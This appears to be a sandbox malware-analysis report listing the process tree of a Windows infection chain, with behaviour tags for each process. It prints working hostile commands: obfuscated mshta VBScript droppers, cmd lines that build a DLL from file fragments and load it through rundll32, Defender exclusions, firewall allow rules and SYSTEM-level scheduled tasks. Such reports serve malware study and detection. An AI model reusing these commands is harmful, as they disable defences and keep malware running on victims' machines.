    Command line: "C:\Users\Admin\AppData\Roaming\5377420.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

(6) C:\Users\Admin\AppData\Roaming\4172725.exe
    Command line: "C:\Users\Admin\AppData\Roaming\4172725.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

(6) C:\Users\Admin\AppData\Roaming\8379179.exe
    Command line: "C:\Users\Admin\AppData\Roaming\8379179.exe"
    - Executes dropped EXE

(6) C:\Users\Admin\AppData\Roaming\859422.exe
    Command line: "C:\Users\Admin\AppData\Roaming\859422.exe"

(7) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" vBscrIPT: CLose( cREaTeobJEcT ( "WscRipT.SHelL" ).rUN( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Roaming\859422.exe"" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF """"== """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\859422.exe"" ) do taskkill /F /IM ""%~nXm"" ", 0 , TRue ) )

(8) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Roaming\859422.exe" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""== "" for %m IN ( "C:\Users\Admin\AppData\Roaming\859422.exe" ) do taskkill /F /IM "%~nXm"

(9) C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe
    Command line: ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5

(10) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" vBscrIPT: CLose( cREaTeobJEcT ( "WscRipT.SHelL" ).rUN( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe"" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""/p046ZeOV5fN93E5 ""== """" for %m IN ( ""C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe"" ) do taskkill /F /IM ""%~nXm"" ", 0 , TRue ) )

(11) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF "/p046ZeOV5fN93E5 "== "" for %m IN ( "C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe" ) do taskkill /F /IM "%~nXm"

(10) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" VBscRiPt: cLoSE ( crEaTeobjECt ("wsCriPt.shElL" ).Run("cMD /q /R eCHo | set /P = ""MZ"" > 1U6QCJ.0ZQ & coPy /Y /B 1U6QcJ.0ZQ + ~M8QTK6.LG +2RWpCG7b.N + QDVQ.nb + NTzZxd.SX ..\5UJAEP._~0 &DeL /Q *& STaRT control.exe ..\5UJAEP._~0 " , 0 , tRUe ) )

(11) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /q /R eCHo | set /P = "MZ" > 1U6QCJ.0ZQ &coPy /Y /B 1U6QcJ.0ZQ + ~M8QTK6.LG+2RWpCG7b.N +QDVQ.nb + NTzZxd.SX ..\5UJAEP._~0 &DeL /Q *& STaRT control.exe ..\5UJAEP._~0

(12) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1U6QCJ.0ZQ"

(12) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" eCHo "

(12) C:\Windows\SysWOW64\control.exe
    Command line: control.exe ..\5UJAEP._~0
    - Checks processor information in registry
    - Enumerates system info in registry

(13) C:\Windows\SysWOW64\rundll32.exe
    Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\5UJAEP._~0
    - Loads dropped DLL

(14) C:\Windows\system32\RunDll32.exe
    Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\5UJAEP._~0

(15) C:\Windows\SysWOW64\rundll32.exe
    Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\5UJAEP._~0
    - Loads dropped DLL

(9) C:\Windows\SysWOW64\taskkill.exe
    Command line: taskkill /F /IM "859422.exe"
    - Kills process with taskkill
(4) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c Sat16862c2e159d0a4.exe

(5) C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe
    Command line: Sat16862c2e159d0a4.exe
    - Executes dropped EXE

(6) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" VBsCRIPt: cLosE( CReATeObJEcT ("WsCripT.sHELl" ).RUN( "CmD /r copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe"" ..\TyIOGZL_DGrJm.EXe && sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE &IF """" == """" for %t iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe"" ) do taskkill -iM ""%~nxt"" /f", 0 ,tRUE ))

(7) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /r copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe" ..\TyIOGZL_DGrJm.EXe &&sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE&IF "" == "" for %t iN ( "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe" ) do taskkill -iM "%~nxt" /f

(8) C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe
    Command line: ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE
    - Executes dropped EXE

(9) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" VBsCRIPt: cLosE( CReATeObJEcT ("WsCripT.sHELl" ).RUN( "CmD /r copy /Y ""C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe"" ..\TyIOGZL_DGrJm.EXe && sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE &IF ""/pndRQSTDuB4kW8vOCUOVSE"" == """" for %t iN ( ""C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe"" ) do taskkill -iM ""%~nxt"" /f", 0 ,tRUE ))

(10) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /r copy /Y "C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe" ..\TyIOGZL_DGrJm.EXe &&sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE&IF "/pndRQSTDuB4kW8vOCUOVSE" == "" for %t iN ( "C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe" ) do taskkill -iM "%~nxt" /f

(9) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" VbscRIpT: CLose(CreATeobJeCt ( "WsCrIpt.SHELL" ). run ("CMd /r ecHO M4%raNdom%Dh> _nV2ETiC.R5 & ECHO | set /P = ""MZ"" > qDz2EUwL.Nn & COpy /b /Y QDz2EUwL.NN + Wz3EN0Ra.r + YAwLKSHG.Nt + 1LRWb.UIm + MmIK6j.ACI +_nV2ETiC.R5 ..\XHtD~USv.J & staRt control ..\xHTD~USV.J & del /Q * " , 0 , True ) )

(10) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /r ecHO M4%raNdom%Dh> _nV2ETiC.R5 & ECHO | set /P = "MZ" > qDz2EUwL.Nn & COpy /b /Y QDz2EUwL.NN + Wz3EN0Ra.r + YAwLKSHG.Nt+ 1LRWb.UIm +MmIK6j.ACI +_nV2ETiC.R5 ..\XHtD~USv.J & staRt control ..\xHTD~USV.J & del /Q *

(11) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>qDz2EUwL.Nn"

(11) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" ECHO "

(11) C:\Windows\SysWOW64\control.exe
    Command line: control ..\xHTD~USV.J

(12) C:\Windows\SysWOW64\rundll32.exe
    Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\xHTD~USV.J
    - Loads dropped DLL

(13) C:\Windows\system32\RunDll32.exe
    Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\xHTD~USV.J

(8) C:\Windows\SysWOW64\taskkill.exe
    Command line: taskkill -iM "Sat16862c2e159d0a4.exe" /f
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken

(4) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c Sat169c60f22b8.exe

(5) C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe
    Command line: Sat169c60f22b8.exe
    - Executes dropped EXE

(6) C:\Users\Admin\AppData\Local\Temp\is-7O1B4.tmp\Sat169c60f22b8.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-7O1B4.tmp\Sat169c60f22b8.tmp" /SL5="$20168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe"
    - Executes dropped EXE
    - Loads dropped DLL

(7) C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe" /SILENT
    - Executes dropped EXE

(8) C:\Users\Admin\AppData\Local\Temp\is-70MBQ.tmp\Sat169c60f22b8.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-70MBQ.tmp\Sat169c60f22b8.tmp" /SL5="$30168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe" /SILENT
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious use of FindShellTrayWindow

(9) C:\Users\Admin\AppData\Local\Temp\is-EUKE1.tmp\postback.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-EUKE1.tmp\postback.exe" ss1
(4) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c Sat1600f41eca.exe
    - Suspicious use of WriteProcessMemory

(5) C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1600f41eca.exe
    Command line: Sat1600f41eca.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses

(6) C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"
    - Executes dropped EXE

(6) C:\Users\Admin\Pictures\Adobe Films\WBGMEjP2ZOPhKrFm3D2PsxK2.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\WBGMEjP2ZOPhKrFm3D2PsxK2.exe"
    - Executes dropped EXE

(7) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 288
    - Program crash

(6) C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

(7) C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"

(8) C:\Users\Admin\AppData\Local\Temp\bdsbfds.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\bdsbfds.exe"

(8) C:\Users\Admin\AppData\Local\Temp\clip.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\clip.exe"
    - Suspicious behavior: SetClipboardViewer

(6) C:\Users\Admin\Pictures\Adobe Films\OLyCAAaDhlJD4xz9ygf7NwsA.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\OLyCAAaDhlJD4xz9ygf7NwsA.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

(6) C:\Users\Admin\Pictures\Adobe Films\J9zM_BwL31SvyQCz441NjFE2.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\J9zM_BwL31SvyQCz441NjFE2.exe"
    - Executes dropped EXE
    - Drops file in Program Files directory

(7) C:\Program Files (x86)\Company\NewProduct\inst2.exe
    Command line: "C:\Program Files (x86)\Company\NewProduct\inst2.exe"
    - Executes dropped EXE

(7) C:\Program Files (x86)\Company\NewProduct\cm3.exe
    Command line: "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
    - Executes dropped EXE

(7) C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
    Command line: "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
    - Executes dropped EXE
    - Checks whether UAC is enabled

(6) C:\Users\Admin\Pictures\Adobe Films\5X4Z1tG8vqSmImDuhk43ndKc.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\5X4Z1tG8vqSmImDuhk43ndKc.exe"

(7) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 296
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(6) C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

(7) C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

(6) C:\Users\Admin\Pictures\Adobe Films\7PEDuinOLwXYX_6iGkQn8Cc8.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\7PEDuinOLwXYX_6iGkQn8Cc8.exe"
    - Executes dropped EXE
    - Drops file in Program Files directory

(7) C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    - Creates scheduled task(s)
(7) C:\Users\Admin\Documents\9Thnn_NJVuhARrG07i9nwHb1.exe
    Command line: "C:\Users\Admin\Documents\9Thnn_NJVuhARrG07i9nwHb1.exe"

(8) C:\Users\Admin\Pictures\Adobe Films\bFnTrTAo0k_bDjinTCLMwvzb.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\bFnTrTAo0k_bDjinTCLMwvzb.exe"

(8) C:\Users\Admin\Pictures\Adobe Films\41QX82bYGlA3Bkj6dsFQtiUV.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\41QX82bYGlA3Bkj6dsFQtiUV.exe"

(9) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 720 -s 276
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(8) C:\Users\Admin\Pictures\Adobe Films\vg9O1s8jU7nNIaD25edzyuif.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\vg9O1s8jU7nNIaD25edzyuif.exe"

(9) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 300
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(8) C:\Users\Admin\Pictures\Adobe Films\YhgrWEcmKvKICpB75ltxZDUA.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\YhgrWEcmKvKICpB75ltxZDUA.exe"

(8) C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe"

(9) C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe" -u

(8) C:\Users\Admin\Pictures\Adobe Films\OblbIZVPY7a0tO5Oh7yjmZQL.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\OblbIZVPY7a0tO5Oh7yjmZQL.exe"
    - Executes dropped EXE
    - Loads dropped DLL

(9) C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
    Command line: C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
    - Loads dropped DLL
    - Adds Run key to start application

(10) C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"

(11) C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
    Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffcbb22dec0,0x7ffcbb22ded0,0x7ffcbb22dee0

(12) C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
    Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7cb799e70,0x7ff7cb799e80,0x7ff7cb799e90

(11) C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,9753090863115678352,9333774829379292461,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15744_1443807735" --mojo-platform-channel-handle=1704 /prefetch:8

(8) C:\Users\Admin\Pictures\Adobe Films\mt1GBIsJD_LSfQtJhR6C12ul.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\mt1GBIsJD_LSfQtJhR6C12ul.exe"

(9) C:\Users\Admin\AppData\Local\Temp\is-FA802.tmp\mt1GBIsJD_LSfQtJhR6C12ul.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-FA802.tmp\mt1GBIsJD_LSfQtJhR6C12ul.tmp" /SL5="$80430,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mt1GBIsJD_LSfQtJhR6C12ul.exe"
    - Loads dropped DLL

(10) C:\Users\Admin\AppData\Local\Temp\is-RTJJI.tmp\lakazet.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-RTJJI.tmp\lakazet.exe" /S /UID=2709
    - Drops file in Drivers directory

(11) C:\Users\Admin\AppData\Local\Temp\4c-e4ab5-ed4-ea9b0-8f9f899edcd19\Gyjegahogu.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\4c-e4ab5-ed4-ea9b0-8f9f899edcd19\Gyjegahogu.exe"

(12) C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wujvlqo.p0q\installer.exe /qn CAMPAIGN="654" & exit

(13) C:\Users\Admin\AppData\Local\Temp\1wujvlqo.p0q\installer.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\1wujvlqo.p0q\installer.exe /qn CAMPAIGN="654"

(12) C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe & exit

(13) C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe

(14) C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe" -u

(12) C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yiug0m2q.0jx\autosubplayer.exe /S & exit
    - Suspicious use of SetWindowsHookEx

(7) C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    - Creates scheduled task(s)

(8) C:\Windows\System32\Conhost.exe
    Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Executes dropped EXE
(6) C:\Users\Admin\Pictures\Adobe Films\uNllGlcbm2GVjpyTbg93jDn7.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\uNllGlcbm2GVjpyTbg93jDn7.exe"
    - Executes dropped EXE
    - Drops file in Windows directory

(7) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\

(7) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \

(7) C:\Windows\System32\netsh.exe
    Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
    - Executes dropped EXE

(7) C:\Windows\System32\netsh.exe
    Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes

(7) C:\Windows\SYSTEM32\schtasks.exe
    Command line: schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
    - Creates scheduled task(s)

(7) C:\Windows\System\svchost.exe
    Command line: "C:\Windows\System\svchost.exe" formal
    - Drops file in Windows directory

(8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\

(8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \

(8) C:\Windows\System32\netsh.exe
    Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes

(8) C:\Windows\System32\netsh.exe
    Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes

(6) C:\Users\Admin\Pictures\Adobe Films\PQBJTAaQtTewucBijOxkjY_l.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\PQBJTAaQtTewucBijOxkjY_l.exe"
    - Executes dropped EXE

(6) C:\Users\Admin\Pictures\Adobe Films\B9fyo7QqeK801elsQ3zzApZx.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\B9fyo7QqeK801elsQ3zzApZx.exe"
    - Executes dropped EXE

(7) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 276
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(6) C:\Users\Admin\Pictures\Adobe Films\7o86wFKJyInJIOUE8xaT8jW5.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\7o86wFKJyInJIOUE8xaT8jW5.exe"

(7) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 272
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(6) C:\Users\Admin\Pictures\Adobe Films\rGwY69WmOM_qqsBGjBQCwu70.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\rGwY69WmOM_qqsBGjBQCwu70.exe"
    - Executes dropped EXE

(7) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 240
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(6) C:\Users\Admin\Pictures\Adobe Films\I43HlxEfzYdBanh5sTg7Y_zX.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\I43HlxEfzYdBanh5sTg7Y_zX.exe"
    - Executes dropped EXE

(7) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 272
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(6) C:\Users\Admin\Pictures\Adobe Films\UiCHUYf2DCZO0cVtFmpt1M5s.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\UiCHUYf2DCZO0cVtFmpt1M5s.exe"
    - Executes dropped EXE

(7) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 204
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(6) C:\Users\Admin\Pictures\Adobe Films\9osAN_jHjbdtS1wgTHVWBnwP.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\9osAN_jHjbdtS1wgTHVWBnwP.exe"
    - Executes dropped EXE

(7) C:\Users\Admin\AppData\Roaming\4999053.exe
    Command line: "C:\Users\Admin\AppData\Roaming\4999053.exe"

(8) C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 4489⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\4421256.exe"C:\Users\Admin\AppData\Roaming\4421256.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\8069537.exe"C:\Users\Admin\AppData\Roaming\8069537.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5011017.exe"C:\Users\Admin\AppData\Roaming\5011017.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2325315.exe"C:\Users\Admin\AppData\Roaming\2325315.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3364777.exe"C:\Users\Admin\AppData\Roaming\3364777.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIPT: CLose( cREaTeobJEcT ( "WscRipT.SHelL" ).rUN( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Roaming\3364777.exe"" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF """"== """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\3364777.exe"" ) do taskkill /F /IM ""%~nXm"" ", 0 , TRue ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Roaming\3364777.exe" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""== "" for %m IN ( "C:\Users\Admin\AppData\Roaming\3364777.exe" ) do taskkill /F /IM "%~nXm"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "3364777.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\5061526.exe"C:\Users\Admin\AppData\Roaming\5061526.exe"7⤵
-
